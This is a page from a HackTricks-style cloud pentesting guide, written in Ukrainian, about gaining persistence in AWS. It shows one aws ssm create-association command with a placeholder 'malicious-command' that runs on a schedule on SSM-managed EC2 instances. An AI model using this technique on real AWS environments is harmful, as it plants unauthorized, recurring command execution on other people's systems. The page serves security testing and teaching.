1.9 KiB
AWS - SSM Персистенція
{{#include ../../../../banners/hacktricks-training.md}}
SSM
Для додаткової інформації див.:
{{#ref}} ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md {{#endref}}
Використання ssm:CreateAssociation для персистенції
Атакувальник із дозволом ssm:CreateAssociation може створити State Manager Association для автоматичного виконання команд на EC2 інстансах, керованих SSM. Такі асоціації можна налаштувати на запуск через фіксований інтервал, що робить їх придатними для backdoor-like persistence без інтерактивних сесій.
aws ssm create-association \
--name SSM-Document-Name \
--targets Key=InstanceIds,Values=target-instance-id \
--parameters commands=["malicious-command"] \
--schedule-expression "rate(30 minutes)" \
--association-name association-name
Note
Цей метод персистентності працює доти, поки EC2 інстанс керується Systems Manager, SSM agent запущено, і зловмисник має дозвіл створювати асоціації. Він не потребує інтерактивних сесій або явних дозволів ssm:SendCommand. Важливо: параметр
--schedule-expression(наприклад,rate(30 minutes)) має відповідати мінімальному інтервалу AWS у 30 хвилин. Для негайного або одноразового виконання повністю опустіть--schedule-expression— асоціація виконається один раз після створення.
{{#include ../../../../banners/hacktricks-training.md}}